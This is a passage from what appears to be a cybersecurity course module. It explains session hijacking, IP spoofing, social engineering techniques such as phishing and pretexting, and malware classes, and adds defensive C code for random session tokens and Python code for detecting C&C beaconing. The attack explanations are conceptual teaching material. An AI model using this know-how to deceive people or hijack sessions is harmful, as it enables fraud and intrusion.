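Two of the token-theft paths listed above, predictable tokens and cookie theft through document.cookie as in the snippet just shown, are addressed on the server. The C example below is added here and is not the module's code: it draws a session token from the operating system's random source (/dev/urandom, so a Unix-like host is assumed) and emits a Set-Cookie header whose HttpOnly attribute keeps the cookie out of script reach, with Secure and SameSite limiting sniffing and cross-site use. The cookie name and the function names are constructed.

```c
// Added example: unpredictable session tokens and a hardened Set-Cookie header.
// Assumes a Unix-like host with /dev/urandom; cookie and function names are constructed.
#include <stdio.h>
#include <string.h>

#define TOKEN_BYTES 16                  // 128 bits of randomness per token
#define TOKEN_HEX_LEN (2 * TOKEN_BYTES)

// Fill `out` with TOKEN_HEX_LEN lowercase hex characters drawn from the OS
// CSPRNG. A counter, timestamp or username-derived value here is exactly the
// "predictable session token" an attacker can guess. Returns 0 or -1.
int generate_session_token(char *out, size_t outsz)
{
    static const char hex[] = "0123456789abcdef";
    unsigned char raw[TOKEN_BYTES];
    if (outsz < TOKEN_HEX_LEN + 1)
        return -1;
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL)
        return -1;
    size_t got = fread(raw, 1, sizeof raw, f);
    fclose(f);
    if (got != sizeof raw)
        return -1;                      // never fall back to weaker randomness
    for (size_t i = 0; i < sizeof raw; i++) {
        out[2 * i]     = hex[raw[i] >> 4];
        out[2 * i + 1] = hex[raw[i] & 0x0f];
    }
    out[TOKEN_HEX_LEN] = '\0';
    return 0;
}

// Server-side sanity check before a presented token is looked up: right length, hex only.
int is_hex_token(const char *s, size_t expected_len)
{
    if (strlen(s) != expected_len)
        return 0;
    for (size_t i = 0; i < expected_len; i++) {
        char c = s[i];
        int ok = (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f');
        if (!ok)
            return 0;
    }
    return 1;
}

// HttpOnly: not readable via document.cookie, so the XSS snippet above gets
// nothing. Secure: never sent over plaintext HTTP, which defeats session
// sniffing. SameSite=Strict: not attached to cross-site requests.
int format_session_cookie(const char *token, char *out, size_t outsz)
{
    int n = snprintf(out, outsz,
                     "Set-Cookie: session=%s; Path=/; HttpOnly; Secure; SameSite=Strict",
                     token);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

int main(void)
{
    char token[TOKEN_HEX_LEN + 1], header[256];
    if (generate_session_token(token, sizeof token) != 0) {
        fprintf(stderr, "no randomness source available\n");
        return 1;
    }
    format_session_cookie(token, header, sizeof header);
    printf("%s\n", header);
    return 0;
}
```

A 128-bit random token cannot be guessed in practice, and with HttpOnly set the script in the module's snippet reads an empty document.cookie; the remaining paths in the list (man-in-the-browser, malware on the client) sit outside what the server can control and are why sessions should also expire and be re-bound on privilege changes.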

IP Spoofing

Spoofing is pretending to be someone else. This technique is used to gain
prohibited access to a computer using the IP address of a trusted host. To carry
it out, the attacker has to obtain the IP address of the client and inject his own
packets, spoofed with the client’s IP address, into the TCP session, so as to trick
the server into believing it is communicating with the victim, i.e. the original
host.

Blind Attack

If an attacker is not able to sniff packets and guess the correct sequence number
expected by the server, brute force combinations of sequence numbers can be tried.

Mitigation

To defend a network against session hijacking, a defender has to implement
security measures at both the application level and the network level. Network
level hijacks can be prevented by encrypting the packets so that the hijacker
cannot decipher the packet headers to obtain any information that would help in
spoofing. This encryption can be provided by using protocols such as IPsec,
SSL, SSH, etc. Internet Protocol Security (IPsec) has the means to encrypt the
packet using a shared key between the two parties involved in the
communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted, while in Tunnel
Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a grave threat to networks and web applications as most
of the systems are vulnerable to it.

3.6.10. Social Engineering Attack

Social engineering is a type of attack vector that aims to obtain information
about a victim by manipulating people.

3.6.10.1. What is Social Engineering?

Social engineering is the term used for a wide scope of malicious activities
accomplished through human interactions. It uses psychological manipulation
to con users into making security mistakes or giving away sensitive
information.

Social engineering attacks happen in one or more steps. A perpetrator first
researches the intended victim to gather necessary background information,
such as potential points of entry and weak security protocols, needed to
proceed with the attack. Then, the attacker moves to gain the victim’s trust and
provide circumstances for subsequent actions that break security practices,
such as revealing sensitive information or granting access to critical resources.

3.6.10.2. Social Engineering Life Cycle

What makes social engineering especially dangerous is that it relies on human
error, rather than vulnerabilities in software and operating systems. Mistakes
made by legitimate users are much less predictable, making them harder to
identify and thwart than a malware-based intrusion.

3.6.10.3. Social engineering attack techniques

Social engineering attacks come in various forms and can be performed
anywhere where human interaction is involved. The following are the five most
common forms of digital social engineering assaults:

3.6.10.4. Baiting

As its name implies, baiting attacks use a false promise to provoke a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or infects their systems with malware.

The most notorious form of baiting uses physical media to disperse malware.
For instance, attackers leave the bait—typically malware-infected flash
drives—in conspicuous areas where potential victims are certain to see them,
such as bathrooms, elevators, or the parking lot of a targeted company. The bait
has an authentic look to it, such as a label presenting it as the company’s payroll
list. Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic installation of malware on the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online, baiting consists of attractive advertisements that lead to malicious sites
or that encourage users to download a malware-infected application.

3.6.10.5. Scareware

Scareware involves victims being swamped with false alarms and fictitious
threats. Users are tricked into thinking their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banner
appearing in your browser while surfing the web, displaying text such as
“Your computer may be infected with harmful spyware programs.” It either
offers to install the tool (often malware-infected) for you, or directs you to
a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or
makes offers for users to buy worthless/harmful services.

3.6.10.6. Pretexting

Here, attackers obtain information through a series of cleverly crafted lies. The
scam is often initiated by a perpetrator pretending to need sensitive
information from a victim in order to perform a critical task.

The attacker usually starts by establishing trust with their victim by
impersonating co-workers, police, bank and tax officials, or other persons who
have right-to-know authority. The pre-texter asks questions that are ostensibly
required to confirm the victim’s identity, through which they gather important
personal data.

All sorts of pertinent information and records are gathered using this scam, such
as social security numbers, personal addresses and phone numbers, phone
records, staff vacation dates, bank records and even security information
related to a physical plant.

3.6.10.7. Phishing

As one of the most popular social engineering attack types, phishing scams are
email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. The messages then urge them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

For example, consider an email sent to users of an online service that alerts them
of a policy violation requiring immediate action on their part, such as a required
password change. It includes a link to an illegitimate website—nearly identical
in appearance to its legitimate version—encouraging the unsuspecting user to
enter their current credentials and new password. Upon form submission the
information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them is much easier for mail servers
having access to threat sharing platforms.

3.6.10.8. Spear phishing

This is a more targeted version of the phishing scam whereby an attacker
chooses specific individuals or enterprises. They then customize their
messages based on characteristics, job positions, and contacts belonging to
their victims to make their attack less detectable. Spear phishing requires much
more effort on behalf of the perpetrator and may take weeks or months to pull
off. Such attacks are much harder to detect and have better success rates if done
skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an
organization’s IT consultant, sends an email to one or more employees. It’s
worded and signed exactly as the consultant normally does, thereby deceiving
recipients into thinking it’s an authentic message. The message prompts
recipients to change their password and provides them with a link that redirects
them to a malicious page where the attacker now captures their credentials.

3.7. SYSTEM BASED ATTACKS

Viruses, worms, Trojans, and bots are all part of a class of software called
"malware." Malware is short for "malicious software," also known
as malicious code or "malcode." It is software or code that is specifically
produced to damage, disrupt, steal, or in general inflict some other illegitimate
action on data, hosts, or networks.

There are many different classes of malware that have varying ways of
infecting systems and propagating themselves. Malware can infect systems by
being packaged with other programs or attached as macros to files. Others are
installed by exploiting a known vulnerability in an operating system (OS),
network device, or other software. However, the clear majority are installed
due to some action from the user, such as clicking an email attachment or
downloading a file from the Internet.

Damage from malware varies from causing minor irritation (such as browser
popup ads), to destroying data, stealing confidential information or money, and
compromising or entirely immobilizing systems and networks.

3.7.1. Classes of Malicious Software

Viruses and Worms are the two most common types of malware. These types
of programs are able to clone themselves and can spread copies of themselves,
which may even be modified copies.

These and other classes of malicious software are described below:

3.7.1.1. Ransomware

Ransomware is a type of malicious software that threatens to publish the
victim's data or perpetually block access to it unless a ransom is paid. Some
simple ransomware may lock the system in a way that is not difficult for a
knowledgeable person to reverse. More advanced malware uses a technique
called cryptoviral extortion, which encrypts the victim's files, making them
inaccessible, and demands a ransom payment to decrypt them.

3.7.1.2. Viruses

A computer virus is a type of malware that propagates by inserting a copy of
itself into, and becoming part of, another program. It spreads infections as it
travels from one computer to another. Viruses can range in severity from
causing mildly annoying effects to damaging data or software and causing
denial-of-service (DoS) conditions. Almost all viruses are attached to
an executable file. This means the virus may exist on a system but will not be
active or able to spread until the user runs or opens the malicious host file or
program. When the host code is executed, the viral code is executed as well.
Usually, the host program keeps functioning after it is infected by the virus.
However, some viruses overwrite other programs with clones of themselves,
which destroys the host program altogether. Viruses spread when the software or
document they are attached to is transferred from one computer to another using
the network, file sharing, a disk, or infected email attachments.

3.7.1.3. Worms

Computer worms are similar to viruses in that they replicate functional copies
of themselves and can cause the same type of damage. While viruses require
the spreading of an infected host file, worms are standalone software and do
not require a host program or human help to spread. Worms either exploit a
vulnerability on the target system or use some kind of social engineering to
fool users into executing them. A worm enters a computer through a
vulnerability in the system and takes advantage of file-transport or
information-transport features on the system, allowing it to travel
independently. More advanced worms use encryption, wipers, and ransomware
technologies to harm their targets.

3.7.1.4. Trojans

A Trojan is another type of malware named after the historic wooden horse
that the Greeks used to infiltrate Troy. It is a damaging piece of software that
looks legitimate. Users are typically deceived into loading and executing it on
their systems. After activation, it can fulfill any number of attacks on the host,
from infuriating the user (popping up windows or changing desktops) to
damaging the host (deleting files, stealing data, or activating and spreading
other malware, such as viruses). Trojans are also known to create backdoors to
give malicious users access to the system. Trojans do not reproduce by
infecting other files nor do they self-replicate like viruses and worms. They
must spread through user interaction such as opening an email attachment or
downloading and running a file from the Internet.

3.7.1.5. Bots

"Bot" is derived from the word "robot". It is an automated process that interacts
with other network services. Bots often automate tasks and provide
information or services that would otherwise be performed by a human
being. A typical use of bots is to gather information, as web crawlers do, or to
interact automatically with Instant Messaging (IM), Internet Relay Chat (IRC),
or other web interfaces. They may also be used to interact dynamically with
websites.

Bots can be used for good or malicious purposes. A malicious bot is self-
propagating malware designed to infect a host and connect back to a central
server or servers that act as a command and control (C&C) center for an entire
network of compromised devices. This network is also called a botnet. With
a botnet, attackers can launch large, remote-controlled flood-type attacks
against their targets.

Along with the ability to self-propagate like worms, bots can include the ability
to log keystrokes, capture and analyze packets, gather passwords, gather
financial information, launch Denial of Service (DoS) attacks, relay spam,
and open backdoors on the infected host. Bots have all the capabilities of worms
but are generally much more adaptable in their infection vector and are often
modified within hours of publication of a new exploit. They have been known
to exploit backdoors opened by worms and viruses, which allows them to
access networks that have good perimeter control. Bots rarely announce their
presence with high scan rates that damage network infrastructure.
Instead, they infect networks in a way that escapes immediate notice.

Advanced botnets may take advantage of common Internet of Things (IoT)
devices, such as home electronics or appliances, to scale up automated
attacks. Crypto mining is a common use of these bots for nefarious purposes.
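The paragraphs above describe bots checking in with a C&C server at regular intervals while trying to escape notice. One defensive consequence is that such check-ins leave a periodic pattern in egress logs. The following is an added example, not part of the module, that flags source/destination pairs whose connection gaps are nearly constant; the log lines are constructed and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample egress log (not real traffic). Format: "timestamp src dst:port".
# 10.0.0.5 checks in with one host every ~5 minutes; 10.0.0.8 browses irregularly.
SAMPLE_LOG = """\
2021-11-01T10:00:00 10.0.0.5 203.0.113.7:443
2021-11-01T10:00:03 10.0.0.8 198.51.100.2:443
2021-11-01T10:05:00 10.0.0.5 203.0.113.7:443
2021-11-01T10:07:41 10.0.0.8 198.51.100.9:80
2021-11-01T10:09:58 10.0.0.5 203.0.113.7:443
2021-11-01T10:12:19 10.0.0.8 198.51.100.2:443
2021-11-01T10:15:00 10.0.0.5 203.0.113.7:443
2021-11-01T10:20:00 10.0.0.5 203.0.113.7:443
2021-11-01T10:31:55 10.0.0.8 198.51.100.2:443
"""


def parse_log(text):
    """Group connection timestamps by (source, destination) pair."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def find_beacons(text, min_connections=4, max_jitter_ratio=0.1):
    """Return {pair: average_gap_seconds} for pairs whose gaps between
    connections are regular enough to resemble scheduled C&C check-ins.
    min_connections and max_jitter_ratio are assumed tuning values."""
    suspicious = {}
    for pair, times in parse_log(text).items():
        if len(times) < min_connections:
            continue                      # too few events to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Coefficient of variation: low jitter relative to the interval is the signal
        if avg > 0 and pstdev(gaps) / avg <= max_jitter_ratio:
            suspicious[pair] = round(avg)
    return suspicious


if __name__ == "__main__":
    for (src, dst), gap in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {dst} every ~{gap}s")
```

Legitimate software (update checkers, monitoring agents) also beacons, so hits are leads for triage against an allow-list rather than verdicts.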

3.7.1.6. Adware

Software that generates revenue for its developer by automatically generating
online advertisements in the user interface of the software or on a screen
presented to the user during the installation process. The software may generate
two types of revenue: one is for the display of the advertisement and another
on a "pay-per-click" basis if the user clicks on the advertisement.

3.7.1.7. Backdoor

An undocumented way of accessing a system, bypassing the normal
authentication mechanisms. Some backdoors are placed in the software by the
original programmer. Others are placed on systems through a system
compromise, such as a virus or worm. Usually, attackers use backdoors for
easier and continued access to a system after it has been compromised.

3.7.1.8. Bootkit

A malware variant that modifies the boot sectors of a hard drive, including the
Master Boot Record (MBR) and Volume Boot Record (VBR). Attackers may
use bootkits to persist on systems at a layer below the operating system, which
may make full restoration difficult unless an organization suspects
one was used and can act accordingly.
